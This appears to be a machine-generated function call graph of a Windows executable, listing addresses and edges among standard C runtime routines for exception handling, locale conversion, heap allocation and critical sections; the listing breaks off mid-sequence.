SetUnhandledExceptionFilter UnhandledExceptionFilter 11162->11163 11164 6e8707 __FrameHandler3::FrameUnwindToState 11163->11164 11235 6e1b47 11164->11235 11166 6e8725 11166->10973 11168 6ee672 __FrameHandler3::FrameUnwindToState 11167->11168 11173 6edaca EnterCriticalSection 11168->11173 11170 6ee680 11174 6ee6c2 11170->11174 11173->11170 11177 6edb12 LeaveCriticalSection 11174->11177 11176 6e9b08 11176->10966 11176->11134 11177->11176 11213 6e8736 11178->11213 11180->11140 11182 6ebe88 11181->11182 11183 6ebe82 11181->11183 11184 6ea0da __dosmaperr 6 API calls 11182->11184 11187 6ebe8c SetLastError 11182->11187 11185 6ea09b __dosmaperr 6 API calls 11183->11185 11186 6ebea4 11184->11186 11185->11182 11186->11187 11189 6e9d12 __dosmaperr 14 API calls 11186->11189 11191 6ebf1c 11187->11191 11192 6ebf21 11187->11192 11190 6ebeb9 11189->11190 11193 6ebed2 11190->11193 11194 6ebec1 11190->11194 11191->11156 11195 6e9b03 __FrameHandler3::FrameUnwindToState 39 API calls 11192->11195 11197 6ea0da __dosmaperr 6 API calls 11193->11197 11196 6ea0da __dosmaperr 6 API calls 11194->11196 11198 6ebf26 11195->11198 11206 6ebecf 11196->11206 11199 6ebede 11197->11199 11200 6ebef9 11199->11200 11201 6ebee2 11199->11201 11203 6ebc9a __dosmaperr 14 API calls 11200->11203 11204 6ea0da __dosmaperr 6 API calls 11201->11204 11202 6e9d6f __freea 14 API calls 11202->11187 11205 6ebf04 11203->11205 11204->11206 11207 6e9d6f __freea 14 API calls 11205->11207 11206->11202 11207->11187 11209 6ee90b 11208->11209 11210 6ee8d3 11208->11210 11234 6edb12 LeaveCriticalSection 11209->11234 11210->11154 11210->11158 11210->11160 11212->11148 11214 6e8748 __strnicoll 11213->11214 11219 6e876d 11214->11219 11220 6e877d 11219->11220 11221 6e8784 11219->11221 11222 6e6930 __strnicoll 16 API calls 11220->11222 11223 6e85c5 __strnicoll GetLastError SetLastError 11221->11223 11227 6e8760 11221->11227 11222->11221 11224 6e87b9 11223->11224 11225 6e8817 __strnicoll 11 API calls 11224->11225 11224->11227 11226 6e87e9 11225->11226 11228 6e66e0 11227->11228 11229 6e66ec 11228->11229 11230 6e6703 11229->11230 11232 6e6980 __strnicoll 41 API calls 11229->11232 11231 6e6716 11230->11231 11233 6e6980 __strnicoll 41 API calls 11230->11233 11232->11230 11233->11231 11234->11210 11236 6e1b4f 11235->11236 11237 6e1b50 IsProcessorFeaturePresent 11235->11237 11236->11166 11239 6e21c2 11237->11239 11242 6e2185 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 11239->11242 11241 6e22a5 11241->11166 11242->11241 11244 6ed08d __FrameHandler3::FrameUnwindToState 11243->11244 11245 6ed0a7 11244->11245 11289 6edaca EnterCriticalSection 11244->11289 11247 6ecf56 11245->11247 11250 6e9b03 __FrameHandler3::FrameUnwindToState 41 API calls 11245->11250 11254 6eccb3 11247->11254 11248 6ed0e3 11290 6ed100 11248->11290 11251 6ed120 11250->11251 11252 6ed0b7 11252->11248 11253 6e9d6f __freea 14 API calls 11252->11253 11253->11248 11294 6ec7b7 11254->11294 11257 6ecce6 11259 6eccfd 11257->11259 11260 6ecceb GetACP 11257->11260 11258 6eccd4 GetOEMCP 11258->11259 11259->10929 11261 6ea7cc 11259->11261 11260->11259 11262 6ea80a 11261->11262 11263 6ea7da 11261->11263 11264 6e9cff __strnicoll 14 API calls 11262->11264 11265 6ea7f5 HeapAlloc 11263->11265 11268 6ea7de __dosmaperr 11263->11268 11267 6ea80f 11264->11267 11266 6ea808 11265->11266 11265->11268 11266->11267 11267->10925 11267->10926 11268->11262 11268->11265 11269 6e9540 __dosmaperr 2 API calls 11268->11269 11269->11268 11271 6eccb3 43 API calls 11270->11271 11272 6ed19c 11271->11272 11273 6ed2a1 11272->11273 11275 6ed1d9 IsValidCodePage 11272->11275 11279 6ed1f4 __FrameHandler3::FrameUnwindToState 11272->11279 11274 6e1b47 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 11273->11274 11276 6ecfc3 11274->11276 11275->11273 11277 6ed1eb 11275->11277 11276->10931 11276->10935 11278 6ed214 GetCPInfo 11277->11278 11277->11279 11278->11273 11278->11279 11336 6ecd87 11279->11336 11282 6ecbb1 __FrameHandler3::FrameUnwindToState 11281->11282 11416 6edaca EnterCriticalSection 11282->11416 11284 6ecbbb 11417 6ecbf2 11284->11417 11289->11252 11293 6edb12 LeaveCriticalSection 11290->11293 11292 6ed107 11292->11245 11293->11292 11295 6ec7d5 11294->11295 11301 6ec7ce 11294->11301 11296 6ebe6c _unexpected 41 API calls 11295->11296 11295->11301 11297 6ec7f6 11296->11297 11302 6eaaec 11297->11302 11301->11257 11301->11258 11303 6eaaff 11302->11303 11305 6eab14 11302->11305 11303->11305 11310 6ee474 11303->11310 11306 6eab4a 11305->11306 11307 6eab5d 11306->11307 11309 6eab72 11306->11309 11307->11309 11331 6ed169 11307->11331 11309->11301 11311 6ee480 __FrameHandler3::FrameUnwindToState 11310->11311 11312 6ebe6c _unexpected 41 API calls 11311->11312 11313 6ee489 11312->11313 11320 6ee4cf 11313->11320 11323 6edaca EnterCriticalSection 11313->11323 11315 6ee4a7 11324 6ee4f5 11315->11324 11320->11305 11321 6e9b03 __FrameHandler3::FrameUnwindToState 41 API calls 11322 6ee4f4 11321->11322 11323->11315 11325 6ee503 __dosmaperr 11324->11325 11327 6ee4b8 11324->11327 11326 6ee228 __dosmaperr 14 API calls 11325->11326 11325->11327 11326->11327 11328 6ee4d4 11327->11328 11329 6edb12 __FrameHandler3::FrameUnwindToState LeaveCriticalSection 11328->11329 11330 6ee4cb 11329->11330 11330->11320 11330->11321 11332 6ebe6c _unexpected 41 API calls 11331->11332 11333 6ed16e 11332->11333 11334 6ed081 __strnicoll 41 API calls 11333->11334 11335 6ed179 11334->11335 11335->11309 11337 6ecdaf GetCPInfo 11336->11337 11338 6ece78 11336->11338 11337->11338 11339 6ecdc7 11337->11339 11341 6e1b47 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 11338->11341 11347 6ee08a 11339->11347 11343 6ecf2a 11341->11343 11343->11273 11346 6f2603 46 API calls 11346->11338 11348 6ec7b7 __strnicoll 41 API calls 11347->11348 11349 6ee0aa 11348->11349 11367 6ed502 11349->11367 11351 6ee166 11353 6e1b47 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 11351->11353 11352 6ee15e 11370 6ee18b 11352->11370 11357 6ece2f 11353->11357 11354 6ee0d7 11354->11351 11354->11352 11356 6ea7cc __strnicoll 15 API calls 11354->11356 11358 6ee0fc __FrameHandler3::FrameUnwindToState __alloca_probe_16 11354->11358 11356->11358 11362 6f2603 11357->11362 11358->11352 11359 6ed502 __strnicoll MultiByteToWideChar 11358->11359 11360 6ee145 11359->11360 11360->11352 11361 6ee14c GetStringTypeW 11360->11361 11361->11352 11363 6ec7b7 __strnicoll 41 API calls 11362->11363 11364 6f2616 11363->11364 11376 6f2414 11364->11376 11374 6ed46a 11367->11374 11371 6ee1a8 11370->11371 11372 6ee197 11370->11372 11371->11351 11372->11371 11373 6e9d6f __freea 14 API calls 11372->11373 11373->11371 11375 6ed47b MultiByteToWideChar 11374->11375 11375->11354 11377 6f242f __strnicoll 11376->11377 11378 6ed502 __strnicoll MultiByteToWideChar 11377->11378 11383 6f2473 11378->11383 11379 6f25ee 11380 6e1b47 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 11379->11380 11382 6ece50 11380->11382 11381 6f2541 11385 6ee18b __freea 14 API calls 11381->11385 11382->11346 11383->11379 11383->11381 11384 6ea7cc __strnicoll 15 API calls 11383->11384 11386 6f2499 __alloca_probe_16 11383->11386 11384->11386 11385->11379 11386->11381 11387 6ed502 __strnicoll MultiByteToWideChar 11386->11387 11388 6f24e2 11387->11388 11388->11381 11404 6ea167 11388->11404 11391 6f2518 11391->11381 11394 6ea167 7 API calls 11391->11394 11392 6f2550 11393 6f25d9 11392->11393 11395 6ea7cc __strnicoll 15 API calls 11392->11395 11397 6f2562 __alloca_probe_16 11392->11397 11396 6ee18b __freea 14 API calls 11393->11396 11394->11381 11395->11397 11396->11381 11397->11393 11398 6ea167 7 API calls 11397->11398 11399 6f25a5 11398->11399 11399->11393 11413 6ed5bc 11399->11413 11401 6f25bf 11401->11393 11402 6f25c8 11401->11402 11403 6ee18b __freea 14 API calls 11402->11403 11403->11381 11405 6e9ddd LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary GetProcAddress 11404->11405 11406 6ea172 11405->11406 11407 6ea19f 11406->11407 11408 6ea178 LCMapStringEx 11406->11408 11409 6ea1c4 __strnicoll 5 API calls 11407->11409 11412 6ea1bf 11408->11412 11411 6ea1b8 LCMapStringW 11409->11411 11411->11412 11412->11381 11412->11391 11412->11392 11415 6ed5cf ___scrt_uninitialize_crt 11413->11415 11414 6ed60d WideCharToMultiByte 11414->11401 11415->11414 11416->11284 11427 6ed381 11417->11427 11419 6ecc14 11420 6ed381 41 API calls 11419->11420 11421 6ecc33 11420->11421 11422 6e9d6f __freea 14 API calls 11421->11422 11423 6ecbc8 11421->11423 11422->11423 11424 6ecbe6 11423->11424 11441 6edb12 LeaveCriticalSection 11424->11441 11426 6ecbd4 11426->10936 11428 6ed392 11427->11428 11436 6ed38e __InternalCxxFrameHandler 11427->11436 11429 6ed399 11428->11429 11432 6ed3ac __FrameHandler3::FrameUnwindToState 11428->11432 11430 6e9cff __strnicoll 14 API calls 11429->11430 11431 6ed39e 11430->11431 11433 6e87ea __strnicoll 41 API calls 11431->11433 11434 6ed3da 11432->11434 11435 6ed3e3 11432->11435 11432->11436 11433->11436 11437 6e9cff __strnicoll 14 API calls 11434->11437 11435->11436 11439 6e9cff __strnicoll 14 API calls 11435->11439 11436->11419 11438 6ed3df 11437->11438 11440 6e87ea __strnicoll 41 API calls 11438->11440 11439->11438 11440->11436 11441->11426 11443 6e9b63 11442->11443 11444 6e9b55 11442->11444 11445 6e9cff __strnicoll 14 API calls 11443->11445 11444->11443 11449 6e9b7b 11444->11449 11446 6e9b6b 11445->11446 11447 6e87ea __strnicoll 41 API calls 11446->11447 11448 6e9b75 11447->11448 11448->10881 11449->11448 11450 6e9cff __strnicoll 14 API calls 11449->11450 11450->11446 11452 6e8ebc 11451->11452 11456 6e8e8d 11451->11456 11453 6e8ed3 11452->11453 11454 6e9d6f __freea 14 API calls 11452->11454 11455 6e9d6f __freea 14 API calls 11453->11455 11454->11452 11455->11456 11456->10883 11458 6e8823 11457->11458 11459 6e85ee __FrameHandler3::FrameUnwindToState 8 API calls 11458->11459 11460 6e8838 GetCurrentProcess TerminateProcess 11459->11460 11460->10887 11462 6e179d 11461->11462 11466 6e16f0 11461->11466 11524 6e1190 11462->11524 11464 6e1724 11511 6e1b55 11464->11511 11465 6e17a2 11530 6e10f0 11465->11530 11466->11464 11468 6e176c 11466->11468 11469 6e1763 11466->11469 11470 6e16f5 __InternalCxxFrameHandler 11466->11470 11473 6e1b55 42 API calls 11468->11473 11469->11464 11469->11465 11470->10676 11472 6e1737 11472->11470 11474 6e87fa 41 API calls 11472->11474 11473->11470 11475 6e17ac 11474->11475 11477 6e15fb 11476->11477 11478 6e16b0 11477->11478 11483 6e160f 11477->11483 11479 6e1190 46 API calls 11478->11479 11480 6e16b5 11479->11480 11482 6e10f0 Concurrency::cancel_current_task 42 API calls 11480->11482 11481 6e163c 11484 6e1b55 42 API calls 11481->11484 11485 6e164f 11482->11485 11483->11481 11486 6e167b 11483->11486 11487 6e1684 11483->11487 11488 6e1614 __InternalCxxFrameHandler 11483->11488 11484->11485 11485->11488 11489 6e87fa 41 API calls 11485->11489 11486->11480 11486->11481 11490 6e1b55 42 API calls 11487->11490 11488->10679 11491 6e16bf 11489->11491 11490->11488 11493 6e1499 GetModuleFileNameW 11492->11493 11494 6e11a0 11493->11494 11495 6e11af 11494->11495 11496 6e11b8 11494->11496 11495->10702 11559 6e8584 11496->11559 11500 6e101e 11499->11500 11981 6e84e0 11500->11981 11504 6e8736 __strnicoll 41 API calls 11503->11504 11505 6e8809 11504->11505 11506 6e8817 __strnicoll 11 API calls 11505->11506 11507 6e8816 11506->11507 12310 6e18d6 11508->12310 11510 6e16ca 11512 6e1b5a ___std_exception_copy 11511->11512 11513 6e1b74 11512->11513 11514 6e9540 __dosmaperr 2 API calls 11512->11514 11515 6e1b76 11512->11515 11513->11472 11514->11512 11516 6e10f0 Concurrency::cancel_current_task 11515->11516 11517 6e1b80 11515->11517 11536 6e2bf5 11516->11536 11519 6e2bf5 std::_Xinvalid_argument RaiseException 11517->11519 11521 6e22c4 11519->11521 11520 6e110c 11539 6e29b5 11520->11539 11548 6e18b6 11524->11548 11531 6e10fe Concurrency::cancel_current_task 11530->11531 11532 6e2bf5 std::_Xinvalid_argument RaiseException 11531->11532 11533 6e110c 11532->11533 11534 6e29b5 ___std_exception_copy 41 API calls 11533->11534 11535 6e1133 11534->11535 11535->11472 11537 6e2c3c RaiseException 11536->11537 11538 6e2c0f 11536->11538 11537->11520 11538->11537 11540 6e29c2 ___std_exception_copy 11539->11540 11544 6e1133 11539->11544 11541 6e29ef 11540->11541 11543 6e9b47 ___std_exception_copy 41 API calls 11540->11543 11540->11544 11545 6e9ae8 11541->11545 11543->11541 11544->11472 11546 6e9d6f __freea 14 API calls 11545->11546 11547 6e9b00 11546->11547 11547->11544 11553 6e1815 11548->11553 11551 6e2bf5 std::_Xinvalid_argument RaiseException 11552 6e18d5 11551->11552 11556 6e17c5 11553->11556 11557 6e29b5 ___std_exception_copy 41 API calls 11556->11557 11558 6e17f1 11557->11558 11558->11551 11560 6e8598 __strnicoll 11559->11560 11565 6e4a57 11560->11565 11563 6e66e0 __strnicoll 41 API calls 11564 6e11d9 11563->11564 11564->10702 11566 6e4aa6 11565->11566 11567 6e4a83 11565->11567 11566->11567 11569 6e4aae 11566->11569 11568 6e876d __strnicoll 29 API calls 11567->11568 11574 6e4a9b 11568->11574 11576 6e6d7e 11569->11576 11570 6e1b47 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 11571 6e4bd8 11570->11571 11571->11563 11574->11570 11589 6e828e 11576->11589 11579 6e4b2f 11586 6e671c 11579->11586 11580 6e6d9e 11581 6e876d __strnicoll 29 API calls 11580->11581 11581->11579 11582 6e6dc5 11582->11579 11593 6e6a54 11582->11593 11596 6e7113 11582->11596 11637 6e75df 11582->11637 11587 6e9d6f __freea 14 API calls 11586->11587 11588 6e672c 11587->11588 11588->11574 11590 6e6d93 11589->11590 11591 6e8299 11589->11591 11590->11579 11590->11580 11590->11582 11592 6e876d __strnicoll 29 API calls 11591->11592 11592->11590 11673 6e4fd0 11593->11673 11595 6e6a91 11595->11582 11597 6e7139 11596->11597 11598 6e7121 11596->11598 11601 6e876d __strnicoll 29 API calls 11597->11601 11607 6e717a 11597->11607 11599 6e760d 11598->11599 11600 6e7677 11598->11600 11598->11607 11604 6e769f 11599->11604 11605 6e7613 11599->11605 11602 6e767c 11600->11602 11603 6e76b6 11600->11603 11606 6e716e 11601->11606 11608 6e767e 11602->11608 11609 6e76ad 11602->11609 11610 6e76bb 11603->11610 11611 6e76d5 11603->11611 11723 6e5a6d 11604->11723 11612 6e7618 11605->11612 11613 6e7644 11605->11613 11606->11582 11607->11582 11614 6e7626 11608->11614 11625 6e768d 11608->11625 11730 6e8004 11609->11730 11615 6e76cc 11610->11615 11618 6e76c0 11610->11618 11738 6e8037 11611->11738 11612->11615 11619 6e761e 11612->11619 11613->11619 11622 6e766c 11613->11622 11635 6e76e0 11614->11635 11696 6e7c7e 11614->11696 11734 6e80bf 11615->11734 11618->11604 11618->11622 11619->11614 11626 6e7651 11619->11626 11632 6e763f 11619->11632 11622->11635 11712 6e5d8c 11622->11712 11625->11604 11627 6e7691 11625->11627 11626->11635 11706 6e7eba 11626->11706 11627->11635 11719 6e7f62 11627->11719 11629 6e1b47 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 11631 6e79d1 11629->11631 11631->11582 11632->11635 11636 6e78c0 11632->11636 11741 6e81e0 11632->11741 11635->11629 11636->11635 11748 6eb86b 11636->11748 11638 6e760d 11637->11638 11639 6e7677 11637->11639 11642 6e769f 11638->11642 11643 6e7613 11638->11643 11640 6e767c 11639->11640 11641 6e76b6 11639->11641 11644 6e767e 11640->11644 11645 6e76ad 11640->11645 11646 6e76bb 11641->11646 11647 6e76d5 11641->11647 11655 6e5a6d 30 API calls 11642->11655 11648 6e7618 11643->11648 11649 6e7644 11643->11649 11660 6e768d 11644->11660 11662 6e7626 11644->11662 11650 6e8004 30 API calls 11645->11650 11651 6e76cc 11646->11651 11652 6e76c0 11646->11652 11654 6e8037 30 API calls 11647->11654 11648->11651 11658 6e761e 11648->11658 11653 6e766c 11649->11653 11649->11658 11669 6e763f 11650->11669 11657 6e80bf 41 API calls 11651->11657 11652->11642 11652->11653 11659 6e5d8c 30 API calls 11653->11659 11671 6e76e0 11653->11671 11654->11669 11655->11669 11656 6e7c7e 44 API calls 11656->11669 11657->11669 11661 6e7651 11658->11661 11658->11662 11658->11669 11659->11669 11660->11642 11663 6e7691 11660->11663 11664 6e7eba 42 API calls 11661->11664 11661->11671 11662->11656 11662->11671 11667 6e7f62 29 API calls 11663->11667 11663->11671 11664->11669 11665 6e1b47 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 11666 6e79d1 11665->11666 11666->11582 11667->11669 11668 6e81e0 ___scrt_uninitialize_crt 41 API calls 11672 6e78c0 11668->11672 11669->11668 11669->11671 11669->11672 11670 6eb86b ___scrt_uninitialize_crt 42 API calls 11670->11672 11671->11665 11672->11670 11672->11671 11683 6e823b 11673->11683 11675 6e4ffb 11677 6e876d __strnicoll 29 API calls 11675->11677 11676 6e4fe6 11676->11675 11680 6e502e 11676->11680 11682 6e5016 11676->11682 11677->11682 11678 6e532d 11679 6e81b1 41 API calls 11678->11679 11679->11682 11680->11678 11690 6e81b1 11680->11690 11682->11595 11684 6e8253 11683->11684 11685 6e8240 11683->11685 11684->11676 11686 6e9cff __strnicoll 14 API calls 11685->11686 11687 6e8245 11686->11687 11688 6e87ea __strnicoll 41 API calls 11687->11688 11689 6e8250 11688->11689 11689->11676 11691 6e81db 11690->11691 11692 6e81c6 11690->11692 11691->11678 11692->11691 11693 6e9cff __strnicoll 14 API calls 11692->11693 11694 6e81d0 11693->11694 11695 6e87ea __strnicoll 41 API calls 11694->11695 11695->11691 11697 6e7c9f 11696->11697 11760 6e4c0b 11697->11760 11699 6e7ce1 11771 6eb580 11699->11771 11702 6e81e0 ___scrt_uninitialize_crt 41 API calls 11703 6e7d97 11702->11703 11704 6e81e0 ___scrt_uninitialize_crt 41 API calls 11703->11704 11705 6e7dd3 11703->11705 11704->11705 11705->11632 11705->11705 11707 6e7ee7 11706->11707 11708 6e81e0 ___scrt_uninitialize_crt 41 API calls 11707->11708 11709 6e7f03 11707->11709 11710 6e7f24 11707->11710 11708->11709 11711 6eb86b ___scrt_uninitialize_crt 42 API calls 11709->11711 11710->11632 11711->11710 11713 6e5da1 11712->11713 11714 6e5dc3 11713->11714 11716 6e5dea 11713->11716 11715 6e876d __strnicoll 29 API calls 11714->11715 11718 6e5de0 11715->11718 11716->11718 11913 6e4c8c 11716->11913 11718->11632 11722 6e7f78 11719->11722 11720 6e876d __strnicoll 29 API calls 11721 6e7f99 11720->11721 11721->11632 11722->11720 11722->11721 11724 6e5a82 11723->11724 11725 6e5aa4 11724->11725 11727 6e5acb 11724->11727 11726 6e876d __strnicoll 29 API calls 11725->11726 11729 6e5ac1 11726->11729 11728 6e4c8c 15 API calls 11727->11728 11727->11729 11728->11729 11729->11632 11731 6e8010 11730->11731 11924 6e574e 11731->11924 11733 6e8020 11733->11632 11735 6e80dc 11734->11735 11737 6e80fa 11735->11737 11931 6e8133 11735->11931 11737->11632 11739 6e5d8c 30 API calls 11738->11739 11740 6e804c 11739->11740 11740->11632 11935 6e6980 11741->11935 11749 6eb87f 11748->11749 11758 6eb88f 11748->11758 11750 6eb8b4 11749->11750 11753 6e81e0 ___scrt_uninitialize_crt 41 API calls 11749->11753 11749->11758 11751 6eb8e8 11750->11751 11752 6eb8c5 11750->11752 11755 6eb964 11751->11755 11756 6eb910 11751->11756 11751->11758 11974 6f197c 11752->11974 11753->11750 11757 6ed502 __strnicoll MultiByteToWideChar 11755->11757 11756->11758 11759 6ed502 __strnicoll MultiByteToWideChar 11756->11759 11757->11758 11758->11636 11759->11758 11761 6e4c32 11760->11761 11762 6e4c20 11760->11762 11761->11762 11763 6ea7cc __strnicoll 15 API calls 11761->11763 11762->11699 11764 6e4c56 11763->11764 11765 6e4c5e 11764->11765 11766 6e4c69 11764->11766 11767 6e9d6f __freea 14 API calls 11765->11767 11790 6e6736 11766->11790 11767->11762 11770 6e9d6f __freea 14 API calls 11770->11762 11772 6eb5b5 11771->11772 11774 6eb591 11771->11774 11772->11774 11775 6eb5e8 11772->11775 11773 6e876d __strnicoll 29 API calls 11785 6e7d74 11773->11785 11774->11773 11776 6eb650 11775->11776 11777 6eb621 11775->11777 11778 6eb679 11776->11778 11779 6eb67e 11776->11779 11793 6eb424 11777->11793 11782 6eb6a6 11778->11782 11783 6eb6e0 11778->11783 11801 6eacad 11779->11801 11786 6eb6ab 11782->11786 11787 6eb6c6 11782->11787 11828 6eafda 11783->11828 11785->11702 11785->11703 11811 6eb355 11786->11811 11821 6eb1d1 11787->11821 11791 6e9d6f __freea 14 API calls 11790->11791 11792 6e4c74 11791->11792 11792->11770 11794 6eb43a 11793->11794 11795 6eb445 11793->11795 11794->11785 11796 6e9b47 ___std_exception_copy 41 API calls 11795->11796 11797 6eb4a0 11796->11797 11798 6eb4aa 11797->11798 11799 6e8817 __strnicoll 11 API calls 11797->11799 11798->11785 11800 6eb4b8 11799->11800 11802 6eacc0 11801->11802 11803 6eaccf 11802->11803 11804 6eacf1 11802->11804 11805 6e876d __strnicoll 29 API calls 11803->11805 11806 6ead06 11804->11806 11808 6ead59 11804->11808 11810 6eace7 __FrameHandler3::FrameUnwindToState __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem _strrchr 11805->11810 11807 6eafda 43 API calls 11806->11807 11807->11810 11809 6e81e0 ___scrt_uninitialize_crt 41 API calls 11808->11809 11808->11810 11809->11810 11810->11785 11835 6f02ab 11811->11835 11815 6eb3c3 11816 6eb403 11815->11816 11817 6eb3dc 11815->11817 11820 6eb3ca 11815->11820 11901 6eb07e 11816->11901 11897 6eb267 11817->11897 11820->11785 11822 6f02ab 43 API calls 11821->11822 11823 6eb200 11822->11823 11824 6efd03 29 API calls 11823->11824 11825 6eb241 11824->11825 11826 6eb248 11825->11826 11827 6eb267 41 API calls 11825->11827 11826->11785 11827->11826 11829 6f02ab 43 API calls 11828->11829 11830 6eb004 11829->11830 11831 6efd03 29 API calls 11830->11831 11832 6eb052 11831->11832 11833 6eb059 11832->11833 11834 6eb07e 41 API calls 11832->11834 11833->11785 11834->11833 11836 6f02df 11835->11836 11837 6e9a4d 41 API calls 11836->11837 11839 6f0348 11837->11839 11838 6f0374 11840 6e9b47 ___std_exception_copy 41 API calls 11838->11840 11839->11838 11841 6f0406 11839->11841 11844 6f03e1 11839->11844 11845 6f03a1 11839->11845 11842 6f03d1 11840->11842 11843 6e9a4d 41 API calls 11841->11843 11846 6f1886 11842->11846 11854 6f03dc 11842->11854 11848 6f0430 11843->11848 11847 6e9b47 ___std_exception_copy 41 API calls 11844->11847 11845->11838 11845->11841 11849 6e8817 __strnicoll 11 API calls 11846->11849 11847->11842 11850 6e9a4d 41 API calls 11848->11850 11851 6f1892 11849->11851 11852 6f0443 11850->11852 11856 6f2ef0 21 API calls 11852->11856 11853 6e1b47 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 11855 6eb385 11853->11855 11854->11853 11891 6efd03 11855->11891 11857 6f04bd 11856->11857 11858 6f3000 __floor_pentium4 21 API calls 11857->11858 11859 6f04c7 11858->11859 11861 6f0725 11859->11861 11864 6f0565 11859->11864 11869 6f07c2 11859->11869 11860 6f09dc 11862 6ed381 41 API calls 11860->11862 11871 6f094e __FrameHandler3::FrameUnwindToState 11860->11871 11863 6ed381 41 API calls 11861->11863 11861->11869 11862->11871 11863->11869 11868 6ed381 41 API calls 11864->11868 11873 6f0602 11864->11873 11865 6f0907 11866 6ed381 41 API calls 11865->11866 11865->11871 11866->11871 11867 6ed381 41 API calls 11870 6f071d 11867->11870 11868->11873 11869->11860 11869->11865 11875 6f0b0c __InternalCxxFrameHandler __FrameHandler3::FrameUnwindToState 11870->11875 11881 6f1020 __InternalCxxFrameHandler __FrameHandler3::FrameUnwindToState 11870->11881 11871->11867 11872 6ed381 41 API calls 11872->11870 11873->11872 11874 6f1583 11877 6efe00 41 API calls 11874->11877 11876 6f0f25 11875->11876 11883 6ed381 41 API calls 11875->11883 11878 6f100e 11876->11878 11879 6ed381 41 API calls 11876->11879 11886 6f15cb 11877->11886 11878->11874 11882 6ed381 41 API calls 11878->11882 11879->11878 11880 6f1646 11885 6f1832 11880->11885 11889 6efe00 41 API calls 11880->11889 11890 6ed381 41 API calls 11880->11890 11881->11876 11884 6ed381 41 API calls 11881->11884 11882->11874 11883->11875 11884->11881 11888 6e9a4d 41 API calls 11885->11888 11886->11880 11887 6ed381 41 API calls 11886->11887 11887->11880 11888->11854 11889->11880 11890->11880 11892 6efd14 11891->11892 11895 6efd36 11891->11895 11893 6e876d __strnicoll 29 API calls 11892->11893 11896 6efd2c __InternalCxxFrameHandler 11893->11896 11894 6e876d __strnicoll 29 API calls 11894->11896 11895->11894 11895->11896 11896->11815 11898 6eb284 11897->11898 11899 6e81e0 ___scrt_uninitialize_crt 41 API calls 11898->11899 11900 6eb308 __FrameHandler3::FrameUnwindToState 11898->11900 11899->11900 11900->11820 11902 6eb090 11901->11902 11903 6eb09a 11902->11903 11906 6eb0bb 11902->11906 11904 6e876d __strnicoll 29 API calls 11903->11904 11905 6eb0b2 11904->11905 11905->11820 11907 6eb110 11906->11907 11908 6e81e0 ___scrt_uninitialize_crt 41 API calls 11906->11908 11909 6e9b47 ___std_exception_copy 41 API calls 11907->11909 11908->11907 11912 6eb148 __InternalCxxFrameHandler 11909->11912 11910 6e8817 __strnicoll 11 API calls 11911 6eb1d0 11910->11911 11912->11910 11914 6e4cb3 11913->11914 11915 6e4ca1 11913->11915 11914->11915 11916 6ea7cc __strnicoll 15 API calls 11914->11916 11915->11718 11917 6e4cd8 11916->11917 11918 6e4ceb 11917->11918 11919 6e4ce0 11917->11919 11921 6e6736 14 API calls 11918->11921 11920 6e9d6f __freea 14 API calls 11919->11920 11920->11915 11922 6e4cf6 11921->11922 11923 6e9d6f __freea 14 API calls 11922->11923 11923->11915 11925 6e5763 11924->11925 11926 6e57ac 11925->11926 11927 6e5785 11925->11927 11929 6e4c8c 15 API calls 11926->11929 11930 6e57a2 11926->11930 11928 6e876d __strnicoll 29 API calls 11927->11928 11928->11930 11929->11930 11930->11733 11932 6e8146 11931->11932 11934 6e814d 11931->11934 11933 6e81e0 ___scrt_uninitialize_crt 41 API calls 11932->11933 11933->11934 11934->11737 11936 6e698e GetLastError 11935->11936 11937 6e69cf 11935->11937 11938 6e699d 11936->11938 11944 6eab19 11937->11944 11952 6ec06e 11938->11952 11941 6e69d6 11942 6e9b03 __FrameHandler3::FrameUnwindToState 39 API calls 11941->11942 11943 6e69db 11942->11943 11945 6e820d 11944->11945 11946 6eab30 11944->11946 11948 6eab77 11945->11948 11946->11945 11947 6ee474 __strnicoll 41 API calls 11946->11947 11947->11945 11949 6eab8e 11948->11949 11950 6e821a 11948->11950 11949->11950 11951 6ed169 __strnicoll 41 API calls 11949->11951 11950->11636 11951->11950 11953 6ec087 11952->11953 11954 6ec081 11952->11954 11956 6ea0da __dosmaperr 6 API calls 11953->11956 11973 6e69ba SetLastError 11953->11973 11955 6ea09b __dosmaperr 6 API calls 11954->11955 11955->11953 11957 6ec0a1 11956->11957 11958 6e9d12 __dosmaperr 14 API calls 11957->11958 11957->11973 11959 6ec0b1 11958->11959 11960 6ec0ce 11959->11960 11961 6ec0b9 11959->11961 11962 6ea0da __dosmaperr 6 API calls 11960->11962 11963 6ea0da __dosmaperr 6 API calls 11961->11963 11964 6ec0da 11962->11964 11965 6ec0c5 11963->11965 11966 6ec0de 11964->11966 11967 6ec0ed 11964->11967 11968 6e9d6f __freea 14 API calls 11965->11968 11969 6ea0da __dosmaperr 6 API calls 11966->11969 11970 6ebc9a __dosmaperr 14 API calls 11967->11970 11968->11973 11969->11965 11971 6ec0f8 11970->11971 11972 6e9d6f __freea 14 API calls 11971->11972 11972->11973 11973->11937 11973->11941 11977 6f36df 11974->11977 11980 6f370d ___scrt_uninitialize_crt 11977->11980 11978 6e1b47 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 11979 6f1997 11978->11979 11979->11758 11980->11978 11982 6e84f4 __strnicoll 11981->11982 11983 6e8516 11982->11983 11984 6e853d 11982->11984 11985 6e876d __strnicoll 29 API calls 11983->11985 11990 6e49fc 11984->11990 11987 6e8531 11985->11987 11988 6e66e0 __strnicoll 41 API calls 11987->11988 11989 6e1038 11988->11989 11989->10689 11991 6e4a08 __FrameHandler3::FrameUnwindToState 11990->11991 11998 6e49d4 EnterCriticalSection 11991->11998 11993 6e4a16 11999 6e675a 11993->11999 11998->11993 12013 6eba45 11999->12013 12001 6e6781 12020 6e6ace 12001->12020 12004 